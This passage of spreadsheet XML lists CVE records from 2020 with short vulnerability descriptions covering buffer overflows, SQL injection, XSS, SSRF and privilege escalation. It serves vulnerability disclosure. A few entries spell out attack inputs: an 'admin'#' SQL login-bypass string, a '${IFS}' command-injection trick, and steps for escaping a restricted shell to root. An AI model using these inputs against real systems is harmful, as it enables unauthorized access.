    <t>** DISPUTED ** A stack buffer overflow in speexenc.c of Speex v1.2 allows attackers to cause a denial of service (DoS) via a crafted WAV file. NOTE: the vendor states "I cannot reproduce it" and it "is a demo program."</t>
  </si>
  <si>
    <t>CVE-2020-23906</t>
  </si>
  <si>
    <t>FFmpeg N-98388-g76a3ee996b allows attackers to cause a denial of service (DoS) via a crafted audio file due to insufficient verification of data authenticity.</t>
  </si>
  <si>
    <t>CVE-2020-23907</t>
  </si>
  <si>
    <t>An issue was discovered in retdec v3.3. In function canSplitFunctionOn() of ir_modifications.cpp, there is a possible out of bounds read due to a heap buffer overflow. The impact is: Deny of Service, Memory Disclosure, and Possible Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-23912</t>
  </si>
  <si>
    <t>An issue was discovered in Bento4 through v1.6.0-637. A NULL pointer dereference exists in the function AP4_StszAtom::GetSampleSize() located in Ap4StszAtom.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-23914</t>
  </si>
  <si>
    <t>An issue was discovered in cpp-peglib through v0.1.12. A NULL pointer dereference exists in the peg::AstOptimizer::optimize() located in peglib.h. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-23915</t>
  </si>
  <si>
    <t>An issue was discovered in cpp-peglib through v0.1.12. peg::resolve_escape_sequence() in peglib.h has a heap-based buffer over-read.</t>
  </si>
  <si>
    <t>CVE-2020-23921</t>
  </si>
  <si>
    <t>An issue was discovered in fast_ber through v0.4. yy::yylex() in asn_compiler.hpp has a heap-based buffer over-read.</t>
  </si>
  <si>
    <t>CVE-2020-23922</t>
  </si>
  <si>
    <t>An issue was discovered in giflib through 5.1.4. DumpScreen2RGB in gif2rgb.c has a heap-based buffer over-read.</t>
  </si>
  <si>
    <t>CVE-2020-23928</t>
  </si>
  <si>
    <t>An issue was discovered in gpac before 1.0.1. The abst_box_read function in box_code_adobe.c has a heap-based buffer over-read.</t>
  </si>
  <si>
    <t>CVE-2020-23930</t>
  </si>
  <si>
    <t>An issue was discovered in gpac through 20200801. A NULL pointer dereference exists in the function nhmldump_send_header located in write_nhml.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-23931</t>
  </si>
  <si>
    <t>CVE-2020-23932</t>
  </si>
  <si>
    <t>An issue was discovered in gpac before 1.0.1. A NULL pointer dereference exists in the function dump_isom_sdp located in filedump.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-23934</t>
  </si>
  <si>
    <t>An issue was discovered in RiteCMS 2.2.1. An authenticated user can directly execute system commands by uploading a php web shell in the "Filemanager" section.</t>
  </si>
  <si>
    <t>CVE-2020-23935</t>
  </si>
  <si>
    <t>Kabir Alhasan Student Management System 1.0 is vulnerable to Authentication Bypass via "Username: admin'# &amp;&amp; Password: (Write Something)".</t>
  </si>
  <si>
    <t>CVE-2020-23936</t>
  </si>
  <si>
    <t>PHPGurukul Vehicle Parking Management System 1.0 is vulnerable to Authentication Bypass via "Username: admin'# &amp;&amp; Password: (Write Something)".</t>
  </si>
  <si>
    <t>CVE-2020-23945</t>
  </si>
  <si>
    <t>A SQL injection vulnerability exists in Victor CMS V1.0 in the cat_id parameter of the category.php file. This parameter can be used by sqlmap to obtain data information in the database.</t>
  </si>
  <si>
    <t>CVE-2020-23957</t>
  </si>
  <si>
    <t>Pega Platform through 8.4.x is affected by Cross Site Scripting (XSS) via the ConnectionID parameter, as demonstrated by a pyActivity=Data-TRACERSettings.pzStartTracerSession request to a PRAuth URI.</t>
  </si>
  <si>
    <t>CVE-2020-23960</t>
  </si>
  <si>
    <t>Multiple cross-site request forgery (CSRF) vulnerabilities in the Admin Console in Fork before 5.8.3 allows remote attackers to perform unauthorized actions as administrator to (1) approve the mass of the user's comments, (2) restoring a deleted user, (3) installing or running modules, (4) resetting the analytics, (5) pinging the mailmotor api, (6) uploading things to the media library, (7) exporting locale.</t>
  </si>
  <si>
    <t>CVE-2020-23962</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability in Catfish CMS 4.9.90 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "announcement_gonggao" parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23967</t>
  </si>
  <si>
    <t>Dr.Web Security Space versions 11 and 12 allow elevation of privilege for local users without administrative privileges to NT AUTHORITY\SYSTEM due to insufficient control during autoupdate.</t>
  </si>
  <si>
    <t>CVE-2020-23968</t>
  </si>
  <si>
    <t>Ilex International Sign&amp;go Workstation Security Suite 7.1 allows elevation of privileges via a symlink attack on ProgramData\Ilex\S&amp;G\Logs\000-sngWSService1.log.</t>
  </si>
  <si>
    <t>CVE-2020-23971</t>
  </si>
  <si>
    <t>gmapfp.org Joomla Component GMapFP J3.30pro is affected by Insecure Permissions. An attacker can access the upload function without authenticating to the application and also can upload files due the issues of unrestricted file uploads which can be bypassed by changing the content-type and name file too double extensions.</t>
  </si>
  <si>
    <t>CVE-2020-23972</t>
  </si>
  <si>
    <t>In Joomla Component GMapFP Version J3.5 and J3.5free, an attacker can access the upload function without authenticating to the application and can also upload files which due to issues of unrestricted file uploads which can be bypassed by changing the content-type and name file too double extensions.</t>
  </si>
  <si>
    <t>CVE-2020-23973</t>
  </si>
  <si>
    <t>KandNconcepts Club CMS 1.1 and 1.2 has SQL Injection via the 'team.php,player.php,club.php' id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23974</t>
  </si>
  <si>
    <t>Create-Project Manager 1.07 has Multi Persistent Cross-site Scripting and HTML injection in via Online chat, Social feed,Message(title-tag), Add new client (all-tags).</t>
  </si>
  <si>
    <t>CVE-2020-23975</t>
  </si>
  <si>
    <t>Webexcels Ecommerce CMS 2.x, 2017, 2018, 2019, 2020 has cross site scripting via the 'search.php' id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23976</t>
  </si>
  <si>
    <t>Webexcels Ecommerce CMS 2.x, 2017, 2018, 2019, 2020 has SQL Injection via the 'content.php' id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23977</t>
  </si>
  <si>
    <t>KandNconcepts Club CMS 1.1 and 1.2 has cross site scripting via the 'team.php,player.php,club.php' id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23978</t>
  </si>
  <si>
    <t>SQL injection can occur in Soluzione Globale Ecommerce CMS v1 via the parameter " offerta.php"</t>
  </si>
  <si>
    <t>CVE-2020-23979</t>
  </si>
  <si>
    <t>13enforme CMS 1.0 has SQL Injection via the 'content.php' id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23980</t>
  </si>
  <si>
    <t>DesignMasterEvents Conference management 1.0.0 allows SQL Injection via the username field on the administrator login page.</t>
  </si>
  <si>
    <t>CVE-2020-23981</t>
  </si>
  <si>
    <t>13enforme CMS 1.0 has Cross Site Scripting via the "content.php" id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23982</t>
  </si>
  <si>
    <t>DesignMasterEvents Conference management 1.0.0 has cross site scripting via the 'certificate.php'</t>
  </si>
  <si>
    <t>CVE-2020-23983</t>
  </si>
  <si>
    <t>Michael-design iChat Realtime PHP Live Support System 1.6 has persistent Cross-site Scripting via chat,text-filed tags.</t>
  </si>
  <si>
    <t>CVE-2020-23984</t>
  </si>
  <si>
    <t>Online Hotel Booking System Pro PHP Version 1.3 has Persistent Cross-site Scripting in Customer registration-form all-tags.</t>
  </si>
  <si>
    <t>CVE-2020-23986</t>
  </si>
  <si>
    <t>Github Read Me Stats commit 3c7220e4f7144f6cb068fd433c774f6db47ccb95 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the function renderError.</t>
  </si>
  <si>
    <t>CVE-2020-23989</t>
  </si>
  <si>
    <t>NeDi 1.9C allows pwsec.php oid XSS.</t>
  </si>
  <si>
    <t>CVE-2020-23995</t>
  </si>
  <si>
    <t>An information disclosure vulnerability in ILIAS before 5.3.19, 5.4.12 and 6.0 allows remote authenticated attackers to get the upload data path via a workspace upload.</t>
  </si>
  <si>
    <t>CVE-2020-23996</t>
  </si>
  <si>
    <t>A local file inclusion vulnerability in ILIAS before 5.3.19, 5.4.10 and 6.0 allows remote authenticated attackers to execute arbitrary code via the import of personal data.</t>
  </si>
  <si>
    <t>CVE-2020-24000</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in eyoucms cms v1.4.7, allows attackers to execute arbitrary code and disclose sensitive information, via the tid parameter to index.php.</t>
  </si>
  <si>
    <t>CVE-2020-24003</t>
  </si>
  <si>
    <t>Microsoft Skype through 8.59.0.77 on macOS has the disable-library-validation entitlement, which allows a local process (with the user's privileges) to obtain unprompted microphone and camera access by loading a crafted library and thereby inheriting Skype Client's microphone and camera access.</t>
  </si>
  <si>
    <t>CVE-2020-24007</t>
  </si>
  <si>
    <t>Umanni RH 1.0 does not limit the number of authentication attempts. An unauthenticated user may exploit this vulnerability to launch a brute-force authentication attack against the Login page.</t>
  </si>
  <si>
    <t>CVE-2020-24008</t>
  </si>
  <si>
    <t>Umanni RH 1.0 has a user enumeration vulnerability. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.</t>
  </si>
  <si>
    <t>CVE-2020-24020</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in FFMpeg 4.2.3 in dnn_execute_layer_pad in libavfilter/dnn/dnn_backend_native_layer_pad.c due to a call to memcpy without length checks, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-24025</t>
  </si>
  <si>
    <t>Certificate validation in node-sass 2.0.0 to 4.14.1 is disabled when requesting binaries even if the user is not specifying an alternative download path.</t>
  </si>
  <si>
    <t>CVE-2020-24026</t>
  </si>
  <si>
    <t>TinyShop, a free and open source mall based on RageFrame2, has a stored XSS vulnerability that affects version 1.2.0. TinyShop allows XSS via the explain_first and again_explain parameters of the /evaluate/index.php page. The vulnerability may be exploited remotely, resulting in cross-site scripting (XSS) or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-24027</t>
  </si>
  <si>
    <t>In Live Networks, Inc., liblivemedia version 20200625, there is a potential buffer overflow bug in the server handling of a RTSP "PLAY" command, when the command specifies seeking by absolute time.</t>
  </si>
  <si>
    <t>CVE-2020-24028</t>
  </si>
  <si>
    <t>ForLogic Qualiex v1 and v3 allows any authenticated customer to achieve privilege escalation via user creations, password changes, or user permission updates.</t>
  </si>
  <si>
    <t>CVE-2020-24029</t>
  </si>
  <si>
    <t>Because of unauthenticated password changes in ForLogic Qualiex v1 and v3, customer and admin permissions and data can be accessed via a simple request.</t>
  </si>
  <si>
    <t>CVE-2020-24030</t>
  </si>
  <si>
    <t>ForLogic Qualiex v1 and v3 has weak token expiration. This allows remote unauthenticated privilege escalation and access to sensitive data via token reuse.</t>
  </si>
  <si>
    <t>CVE-2020-24032</t>
  </si>
  <si>
    <t>tz.pl on XoruX LPAR2RRD and STOR2RRD 2.70 virtual appliances allows cmd=set&amp;tz=OS command injection via shell metacharacters in a timezone.</t>
  </si>
  <si>
    <t>CVE-2020-24033</t>
  </si>
  <si>
    <t>An issue was discovered in fs.com S3900 24T4S 1.7.0 and earlier. The form does not have an authentication or token authentication mechanism that allows remote attackers to forge requests on behalf of a site administrator to change all settings including deleting users, creating new users with escalated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-24034</t>
  </si>
  <si>
    <t>Sagemcom F@ST 5280 routers using firmware version 1.150.61 have insecure deserialization that allows any authenticated user to perform a privilege escalation to any other user. By making a request with valid sess_id, nonce, and ha1 values inside of the serialized session cookie, an attacker may alter the user value inside of this cookie, and assume the role and permissions of the user specified. By assuming the role of the user internal, which is inaccessible to end users by default, the attacker gains the permissions of the internal account, which includes the ability to flash custom firmware to the router, allowing the attacker to achieve a complete compromise.</t>
  </si>
  <si>
    <t>CVE-2020-24036</t>
  </si>
  <si>
    <t>PHP object injection in the Ajax endpoint of the backend in ForkCMS below version 5.8.3 allows an authenticated remote user to execute malicious code.</t>
  </si>
  <si>
    <t>CVE-2020-24038</t>
  </si>
  <si>
    <t>myFax version 229 logs sensitive information in the export log module which allows any user to access critical information.</t>
  </si>
  <si>
    <t>CVE-2020-24045</t>
  </si>
  <si>
    <t>A sandbox escape issue was discovered in TitanHQ SpamTitan Gateway 7.07. It limits the admin user to a restricted shell, allowing execution of a small number of tools of the operating system. The restricted shell can be bypassed by presenting a fake vmware-tools ISO image to the guest virtual machine running SpamTitan Gateway. This ISO image should contain a valid Perl script at the vmware-freebsd-tools/vmware-tools-distrib/vmware-install.pl path. The fake ISO image will be mounted and the script wmware-install.pl will be executed with super-user privileges as soon as the hidden option to install VMware Tools is selected in the main menu of the restricted shell (option number 5). The contents of the script can be whatever the attacker wants, including a backdoor or similar.</t>
  </si>
  <si>
    <t>CVE-2020-24046</t>
  </si>
  <si>
    <t>A sandbox escape issue was discovered in TitanHQ SpamTitan Gateway 7.07. It limits the admin user to a restricted shell, allowing execution of a small number of tools of the operating system. This restricted shell can be bypassed after changing the properties of the user admin in the operating system file /etc/passwd. This file cannot be accessed though the restricted shell, but it can be modified by abusing the Backup/Import Backup functionality of the web interface. An authenticated attacker would be able to obtain the file /var/tmp/admin.passwd after executing a Backup operation. This file can be manually modified to change the GUID of the user to 0 (root) and change the restricted shell to a normal shell /bin/sh. After the modification is done, the file can be recompressed to a .tar.bz file and imported again via the Import Backup functionality. The properties of the admin user will be overwritten and a root shell will be granted to the user upon the next successful login.</t>
  </si>
  <si>
    <t>CVE-2020-24051</t>
  </si>
  <si>
    <t>The Moog EXO Series EXVF5C-2 and EXVP7C2-3 units support the ONVIF interoperability IP-based physical security protocol, which requires authentication for some of its operations. It was found that the authentication check for those ONVIF operations can be bypassed. An attacker can abuse this issue to execute privileged operations without authentication, for instance, to create a new Administrator user.</t>
  </si>
  <si>
    <t>CVE-2020-24052</t>
  </si>
  <si>
    <t>Several XML External Entity (XXE) vulnerabilities in the Moog EXO Series EXVF5C-2 and EXVP7C2-3 units allow remote unauthenticated users to read arbitrary files via a crafted Document Type Definition (DTD) in an XML request.</t>
  </si>
  <si>
    <t>CVE-2020-24053</t>
  </si>
  <si>
    <t>Moog EXO Series EXVF5C-2 and EXVP7C2-3 units have a hardcoded credentials vulnerability. This could cause a confidentiality issue when using the FTP, Telnet, or SSH protocols.</t>
  </si>
  <si>
    <t>CVE-2020-24054</t>
  </si>
  <si>
    <t>The administration console of the Moog EXO Series EXVF5C-2 and EXVP7C2-3 units features a 'statusbroadcast' command that can spawn a given process repeatedly at a certain time interval as 'root'. One of the limitations of this feature is that it only takes a path to a binary without arguments; however, this can be circumvented using special shell variables, such as '${IFS}'. As a result, an attacker can execute arbitrary commands as 'root' on the units.</t>
  </si>
  <si>
    <t>CVE-2020-24055</t>
  </si>
  <si>
    <t>Verint 5620PTZ Verint_FW_0_42 and Verint 4320 V4320_FW_0_23, and V4320_FW_0_31 units feature an autodiscovery service implemented in the binary executable '/usr/sbin/DM' that listens on port TCP 6666. The service is vulnerable to a stack buffer overflow. It is worth noting that this service does not require any authentication.</t>
  </si>
  <si>
    <t>CVE-2020-24056</t>
  </si>
  <si>
    <t>A hardcoded credentials vulnerability exists in Verint 5620PTZ Verint_FW_0_42, Verint 4320 V4320_FW_0_23, V4320_FW_0_31, and Verint S5120FD Verint_FW_0_42units. This could cause a confidentiality issue when using the FTP, Telnet, or SSH protocols.</t>
  </si>
  <si>
    <t>CVE-2020-24057</t>
  </si>
  <si>
    <t>The management website of the Verint S5120FD Verint_FW_0_42 unit features a CGI endpoint ('ipfilter.cgi') that allows the user to manage network filtering on the unit. This endpoint is vulnerable to a command injection. An authenticated attacker can leverage this issue to execute arbitrary commands as 'root'.</t>
  </si>
  <si>
    <t>CVE-2020-24063</t>
  </si>
  <si>
    <t>The Canto plugin 1.3.0 for WordPress allows includes/lib/download.php?subdomain= SSRF.</t>
  </si>
  <si>
    <t>CVE-2020-24074</t>
  </si>
  <si>
    <t>The decode program in silk-v3-decoder Version:20160922 Build By kn007 does not strictly check data, resulting in a buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-24085</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability exists in MISP v2.4.128 in app/Controller/UserSettingsController.php at SetHomePage() function. Due to a lack of controller validation in "path" parameter, an attacker can execute malicious JavaScript code.</t>
  </si>
  <si>
    <t>CVE-2020-24104</t>
  </si>
  <si>
    <t>XSS on the PIX-Link Repeater/Router LV-WR07 with firmware v28K.Router.20170904 allows attackers to steal credentials without being connected to the network. The attack vector is a crafted ESSID, as demonstrated by the wireless.htm SET2 parameter.</t>
  </si>
  <si>
    <t>CVE-2020-24115</t>
  </si>
  <si>
    <t>In projectworlds Online Book Store 1.0 Use of Hard-coded Credentials in source code leads to admin panel access.</t>
  </si>
  <si>
    <t>CVE-2020-24119</t>
  </si>
  <si>
    <t>A heap buffer overflow read was discovered in upx 4.0.0, because the check in p_lx_elf.cpp is not perfect.</t>
  </si>
  <si>
    <t>CVE-2020-24130</t>
  </si>
  <si>
    <t>A cross site request forgery (CSRF) vulnerability in the configure.html component of Ponzu 0.11.0 allows attackers to change user and administrator credentials, and add or delete administrator accounts.</t>
  </si>
  <si>
    <t>CVE-2020-24133</t>
  </si>
  <si>
    <t>A heap buffer overflow vulnerability in the r_asm_swf_disass function of Radare2-extras before commit e74a93c allows attackers to execute arbitrary code or carry out denial of service (DOS) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-24135</t>
  </si>
  <si>
    <t>A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Wcms 0.3.2, which allows remote attackers to inject arbitrary web script and HTML via the type parameter to wex/cssjs.php.</t>
  </si>
  <si>
    <t>CVE-2020-24136</t>
  </si>
  <si>
    <t>Directory traversal in Wcms 0.3.2 allows an attacker to read arbitrary files on the server that is running an application via the pagename parameter to wex/html.php.</t>
  </si>
  <si>
    <t>CVE-2020-24137</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in Wcms 0.3.2 allows an attacker to read arbitrary files on the server that is running an application via the path parameter to wex/cssjs.php.</t>
  </si>
  <si>
    <t>CVE-2020-24138</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in wcms 0.3.2 allows remote attackers to inject arbitrary web script and HTML via the pagename parameter to wex/html.php.</t>
  </si>
  <si>
    <t>CVE-2020-24139</t>
  </si>
  <si>
    <t>Server-side request forgery in Wcms 0.3.2 lets an attacker send crafted requests from the back-end server of a vulnerable web application via the path parameter to wex/cssjs.php. It can help identify open ports, local network hosts and execute command on local services.</t>
  </si>
  <si>
    <t>CVE-2020-24140</t>
  </si>
  <si>
    <t>Server-side request forgery in Wcms 0.3.2 let an attacker send crafted requests from the back-end server of a vulnerable web application via the pagename parameter to wex/html.php. It can help identify open ports, local network hosts and execute command on local services.</t>
  </si>
  <si>
    <t>CVE-2020-24141</t>
  </si>
  <si>
    <t>Server-side request forgery in the WP-DownloadManager plugin 1.68.4 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the file_remote parameter to download-add.php. It can help identify open ports, local network hosts and execute command on services</t>
  </si>
  <si>
    <t>CVE-2020-24142</t>
  </si>
  <si>
    <t>Server-side request forgery in the Video Downloader for TikTok (aka downloader-tiktok) plugin 1.3 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the njt-tk-download-video parameter. It can help identify open ports, local network hosts and execute command on services</t>
  </si>
  <si>
    <t>CVE-2020-24143</t>
  </si>
  <si>
    <t>Directory traversal in the Video Downloader for TikTok (aka downloader-tiktok) plugin 1.3 for WordPress lets an attacker get access to files that are stored outside the web root folder via the njt-tk-download-video parameter.</t>
  </si>
  <si>
    <t>CVE-2020-24144</t>
  </si>
  <si>
    <t>Directory traversal in the Media File Organizer (aka media-file-organizer) plugin 1.0.1 for WordPress lets an attacker get access to files that are stored outside the web root folder via the items[] parameter in a move operation.</t>
  </si>
  <si>
    <t>CVE-2020-24145</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in the CM Download Manager (aka cm-download-manager) plugin 2.7.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via a crafted deletescreenshot action.</t>
  </si>
  <si>
    <t>CVE-2020-24146</t>
  </si>
  <si>
    <t>Directory traversal in the CM Download Manager (aka cm-download-manager) plugin 2.7.0 for WordPress allows authorized users to delete arbitrary files and possibly cause a denial of service via the fileName parameter in a deletescreenshot action.</t>
  </si>
  <si>
    <t>CVE-2020-24147</t>
  </si>
  <si>
    <t>Server-side request forgery (SSR) vulnerability in the WP Smart Import (wp-smart-import) plugin 1.0.0 for WordPress via the file field.</t>
  </si>
  <si>
    <t>CVE-2020-24148</t>
  </si>
  <si>
    <t>Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action.</t>
  </si>
  <si>
    <t>CVE-2020-24149</t>
  </si>
  <si>
    <t>Server-side request forgery (SSRF) in the Podcast Importer SecondLine (podcast-importer-secondline) plugin 1.1.4 for WordPress via the podcast_feed parameter in a secondline_import_initialize action to the secondlinepodcastimport page.</t>
  </si>
  <si>
    <t>CVE-2020-24158</t>
  </si>
  <si>
    <t>360 Speed Browser 12.0.1247.0 has a DLL hijacking vulnerability, which can be exploited by attackers to execute malicious code. It is a dual-core browser owned by Beijing Qihoo Technology.</t>
  </si>
  <si>
    <t>CVE-2020-24159</t>
  </si>
  <si>
    <t>NetEase Youdao Dictionary has a DLL hijacking vulnerability, which can be exploited by attackers to gain server permissions. This affects Guangzhou NetEase Youdao Dictionary 8.9.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-24160</t>
  </si>
  <si>
    <t>Shenzhen Tencent TIM Windows client 3.0.0.21315 has a DLL hijacking vulnerability, which can be exploited by attackers to execute malicious code.</t>
  </si>
  <si>
    <t>CVE-2020-24161</t>
  </si>
  <si>
    <t>Guangzhou NetEase Mail Master 4.14.1.1004 on Windows has a DLL hijacking vulnerability. Attackers can use this vulnerability to execute malicious code.</t>
  </si>
  <si>
    <t>CVE-2020-24162</t>
  </si>
  <si>
    <t>The Shenzhen Tencent app 5.8.2.5300 for PC platforms (from Tencent App Center) has a DLL hijacking vulnerability. Attackers can use this vulnerability to execute malicious code.</t>
  </si>
  <si>
    <t>CVE-2020-24164</t>
  </si>
  <si>
    <t>A deserialization flaw is present in Taoensso Nippy before 2.14.2. In some circumstances, it is possible for an attacker to create a malicious payload that, when deserialized, will allow arbitrary code to be executed. This occurs because there is automatic use of the Java Serializable interface.</t>
  </si>
  <si>
    <t>CVE-2020-24175</t>
  </si>
  <si>
    <t>Buffer overflow in Yz1 0.30 and 0.32, as used in IZArc 4.4, ZipGenius 6.3.2.3116, and Explzh (extension) 8.14, allows attackers to execute arbitrary code via a crafted archive file, related to filename handling.</t>
  </si>
  <si>
    <t>CVE-2020-24186</t>
  </si>
  <si>
    <t>A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 through 7.0.4 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files via the wmuUploadFiles AJAX action.</t>
  </si>
  <si>
    <t>CVE-2020-24188</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the search functionality in United Planet Intrexx Professional before 20.03 allows remote attackers to inject arbitrary web script or HTML via the request parameter.</t>
  </si>
  <si>
    <t>CVE-2020-24193</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in login in Sourcecodetester Daily Tracker System 1.0 allows unauthenticated user to execute authentication bypass with SQL injection via the email parameter.</t>
  </si>
  <si>
    <t>CVE-2020-24194</t>
  </si>
  <si>
    <t>A Cross-site scripting (XSS) vulnerability in 'user-profile.php' in SourceCodester Daily Tracker System v1.0 allows remote attackers to inject arbitrary web script or HTML via the 'fullname' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-24195</t>
  </si>
  <si>
    <t>An Arbitrary File Upload in the Upload Image component in Sourcecodester Online Bike Rental v1.0 allows authenticated administrator to conduct remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-24196</t>
  </si>
  <si>
    <t>An Arbitrary File Upload in Vehicle Image Upload in Online Bike Rental v1.0 allows authenticated admin to conduct remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-24197</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in the login component in Stock Management System v1.0 allows remote attacker to execute arbitrary SQL commands via the username parameter.</t>
  </si>
  <si>
    <t>CVE-2020-24198</t>
  </si>
  <si>
    <t>A persistent cross-site scripting vulnerability in Sourcecodester Stock Management System v1.0 allows remote attackers to inject arbitrary web script or HTML via the 'Brand Name.'</t>
  </si>
  <si>
    <t>CVE-2020-24199</t>
  </si>
  <si>
    <t>Arbitrary File Upload in the Vehicle Image Upload component in Project Worlds Car Rental Management System v1.0 allows attackers to conduct remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-24202</t>
  </si>
  <si>
    <t>File Upload component in Projects World House Rental v1.0 suffers from an arbitrary file upload vulnerability with regular users, which allows remote attackers to conduct code execution.</t>
  </si>
  <si>
    <t>CVE-2020-24203</t>
  </si>
  <si>
    <t>Insecure File Permissions and Arbitrary File Upload in the upload pic function in updatesubcategory.php in Projects World Travel Management System v1.0 allows remote unauthenticated attackers to gain remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-24208</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in SourceCodester Online Shopping Alphaware 1.0 allows remote unauthenticated attackers to bypass the authentication process via email and password parameters.</t>
  </si>
  <si>
    <t>CVE-2020-24213</t>
  </si>
  <si>
    <t>An integer overflow was discovered in YGOPro ygocore v13.51. Attackers can use it to leak the game server thread's memory.</t>
  </si>
  <si>
    <t>CVE-2020-24214</t>
  </si>
  <si>
    <t>An issue was discovered in the box application on HiSilicon based IPTV/H.264/H.265 video encoders. Attackers can send a crafted unauthenticated RTSP request to cause a buffer overflow and application crash. The device will not be able to perform its main purpose of video encoding and streaming for up to a minute, until it automatically reboots. Attackers can send malicious requests once a minute, effectively disabling the device.</t>
  </si>
  <si>
    <t>CVE-2020-24215</t>
  </si>
  <si>
    <t>An issue was discovered in the box application on HiSilicon based IPTV/H.264/H.265 video encoders. Attackers can use hard-coded credentials in HTTP requests to perform any administrative task on the device including retrieving the device's configuration (with the cleartext admin password), and uploading a custom firmware update, to ultimately achieve arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-24216</t>
  </si>
  <si>
    <t>An issue was discovered in the box application on HiSilicon based IPTV/H.264/H.265 video encoders. When the administrator configures a secret URL for RTSP streaming, the stream is still available via its default name such as /0. Unauthenticated attackers can view video streams that are meant to be private.</t>
  </si>
  <si>
    <t>CVE-2020-24217</t>
  </si>
  <si>
    <t>An issue was discovered in the box application on HiSilicon based IPTV/H.264/H.265 video encoders. The file-upload endpoint does not enforce authentication. Attackers can send an unauthenticated HTTP request to upload a custom firmware component, possibly in conjunction with command injection, to achieve arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-24218</t>
  </si>
  <si>
    <t>An issue was discovered on URayTech IPTV/H.264/H.265 video encoders through 1.97. Attackers can log in as root via the password that is hard-coded in the executable file.</t>
  </si>
  <si>
    <t>CVE-2020-24219</t>
  </si>
  <si>
    <t>An issue was discovered on URayTech IPTV/H.264/H.265 video encoders through 1.97. Attackers can send crafted unauthenticated HTTP requests to exploit path traversal and pattern-matching programming flaws, and retrieve any file from the device's file system, including the configuration file with the cleartext administrative password.</t>
  </si>
  <si>
    <t>CVE-2020-24220</t>
  </si>
  <si>
    <t>ShopXO v1.8.1 has a command execution vulnerability. Attackers can use this vulnerability to execute arbitrary commands and gain control of the server.</t>
  </si>
  <si>
    <t>CVE-2020-24223</t>
  </si>
  <si>
    <t>Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters.</t>
  </si>
  <si>
    <t>CVE-2020-24227</t>
  </si>
  <si>
    <t>Playground Sessions v2.5.582 (and earlier) for Windows, stores the user credentials in plain text allowing anyone with access to UserProfiles.sol to extract the email and password.</t>
  </si>
  <si>
    <t>CVE-2020-24231</t>
  </si>
  <si>
    <t>Symmetric DS &lt;3.12.0 uses mx4j to provide access to JMX over HTTP. mx4j, by default, has no auth and is available on all interfaces. An attacker can interact with JMX: get system info, and invoke MBean methods. It is possible to install additional MBeans from a remote host using MLet that leads to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-24240</t>
  </si>
  <si>
    <t>GNU Bison before 3.7.1 has a use-after-free in _obstack_free in lib/obstack.c (called from gram_lex) when a '\0' byte is encountered. NOTE: there is a risk only if Bison is used with untrusted input, and the observed bug happens to cause unsafe behavior with a specific compiler/architecture. The bug report was intended to show that a crash may occur in Bison itself, not that a crash may occur in code that is generated by Bison.</t>
  </si>
  <si>
    <t>CVE-2020-24241</t>
  </si>
  <si>
    <t>In Netwide Assembler (NASM) 2.15rc10, there is heap use-after-free in saa_wbytes in nasmlib/saa.c.</t>
  </si>
  <si>
    <t>CVE-2020-24242</t>
  </si>
  <si>
    <t>In Netwide Assembler (NASM) 2.15rc10, SEGV can be triggered in tok_text in asm/preproc.c by accessing READ memory.</t>
  </si>
  <si>
    <t>CVE-2020-24246</t>
  </si>
  <si>
    <t>Peplink Balance before 8.1.0rc1 allows an unauthenticated attacker to download PHP configuration files (/filemanager/php/connector.php) from Web Admin.</t>
  </si>
  <si>
    <t>CVE-2020-24263</t>
  </si>
  <si>
    <t>Portainer 1.24.1 and earlier is affected by an insecure permissions vulnerability that may lead to remote arbitrary code execution. A non-admin user is allowed to spawn new containers with critical capabilities such as SYS_MODULE, which can be used to take over the Docker host.</t>
  </si>
  <si>
    <t>CVE-2020-24264</t>
  </si>
  <si>
